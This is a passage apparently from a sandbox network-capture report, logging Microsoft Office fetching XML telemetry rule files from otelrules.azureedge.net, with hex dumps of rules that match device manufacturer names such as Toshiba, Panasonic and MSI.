                                                                                                                                                                                  2024-11-23 18:52:36 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  39192.168.2.74974413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:38 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 420
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                  x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185238Z-174c587ffdf9xbcchC1TEBxkz40000000370000000007hma
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:38 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  40192.168.2.74974613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:38 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                  x-ms-request-id: 3c6e4b4f-901e-005b-7308-3d2005000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185238Z-178bfbc474bfw4gbhC1NYCunf400000004rg00000000rk27
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:39 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  41192.168.2.74974513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:38 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:38 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                  x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185238Z-178bfbc474bscnbchC1NYCe7eg00000004y000000000g4k2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:39 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  42192.168.2.74974813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:39 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:40 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 423
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                  x-ms-request-id: f14fa7ac-201e-000c-4a8c-3a79c4000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185239Z-174c587ffdfcb7qhhC1TEB3x7000000003fg000000003acn
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:40 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  43192.168.2.74974713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:39 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:39 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 486
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                  x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185239Z-178bfbc474bgvl54hC1NYCsfuw00000004w0000000006xwn
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  44192.168.2.74974913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:40 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:41 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 404
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                  x-ms-request-id: d277967d-801e-0047-0163-3b7265000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185241Z-178bfbc474bp8mkvhC1NYCzqnn00000004u0000000000a0f
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:41 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  45192.168.2.74975013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:41 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:41 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB046B576"
                                                                                                                                                                                  x-ms-request-id: e83eb970-001e-0046-777e-3ada4b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185241Z-174c587ffdfp4vpjhC1TEBybqw000000038000000000mr1a
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  46192.168.2.74975113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:41 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:41 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 478
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9B233827"
                                                                                                                                                                                  x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185241Z-178bfbc474bxkclvhC1NYC69g400000004qg00000000hwkx
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:41 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  47192.168.2.74975313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:42 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:42 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 479
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                  x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185242Z-178bfbc474b7cbwqhC1NYC8z4n00000004ug000000004ywc
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:42 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  48192.168.2.74975213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:42 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:42 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 400
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
